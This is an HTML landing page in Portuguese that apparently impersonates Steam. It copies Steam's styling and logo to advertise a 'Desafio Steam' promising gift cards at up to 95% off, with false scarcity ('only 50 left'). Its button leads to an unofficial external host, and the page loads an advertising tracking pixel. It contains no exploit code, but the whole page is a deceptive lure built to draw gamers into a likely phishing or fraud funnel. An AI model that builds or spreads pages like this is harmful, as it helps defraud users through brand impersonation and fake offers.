<!DOCTYPE html><html lang="pt-BR"><head>
    <link rel="icon" type="image/png" href="images/favicon.png">
    
<script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>
<script>
  window.pixelId = "67257be97e2e2f1c8710af74";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script><script async="" defer="" src="js/pixel.js"></script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Participe do nosso Desafio Steam e desbloqueie descontos de até 95% em Gift Cards! Aproveite essa oportunidade única para expandir sua biblioteca de jogos com preços imbatíveis!">
    <title>Desafio Steam</title>
    <style>
        body {
            background-color: #171A21;
            font-family: 'Roboto', sans-serif;
            color: #C7D5E0;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
        }
        h1 {
            color: #FFFFFF;
            font-size: 32px;
            margin-bottom: 20px;
        }
        p {
            font-size: 16px;
            margin-bottom: 15px;
            text-align: center;
        }
        a {
            display: inline-block;
            background-color: #5C7E10;
            color: #FFFFFF;
            padding: 15px 30px;
            font-size: 16px;
            text-decoration: none;
            border-radius: 0;
            transition: background-color 0.3s;
        }
        a:hover {
            background-color: #4B6A0E;
        }
        .container {
            background-color: #1B2838;
            padding: 40px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
            text-align: center;
        }
        .small-text {
            font-size: 12px;
            color: #A9A9A9;
            margin-top: 150px;
        }
        .header-image {
            width: 150px;
            opacity: 0.7;
            margin-top: 0px; /* Reduzido de 15px para 5px */
            margin-bottom: 20px;
        }
    </style>
    <link rel="icon" href="https://aniversariosteam.store/Seguro/images/favicon.png" type="image/png">
</head>
<body>
    <img src="images/header_logo.png" alt="Steam Logo" class="header-image">
    <div class="container">
        <h1>Bem-vindo ao Desafio da Steam!</h1>
        <p>Prepare-se para um <b>desafio épico</b> no <b>universo dos jogos</b>! Complete as missões e desbloqueie <b>ofertas exclusivas</b>, com <b>descontos de até 95%</b> em <b>Gift Cards</b> da Steam.</p>
        <p>Não perca essa oportunidade única de expandir sua biblioteca de jogos a preços imbatíveis. Restam apenas <b>50 Gift Cards</b>!</p>
        <a href="https://steamgiftcards.on-fleek.app">COMEÇAR DESAFIO</a>
        <p class="small-text">*Ofertas válidas por tempo limitado. Não perca sua chance!</p>
    </div>






</body></html>
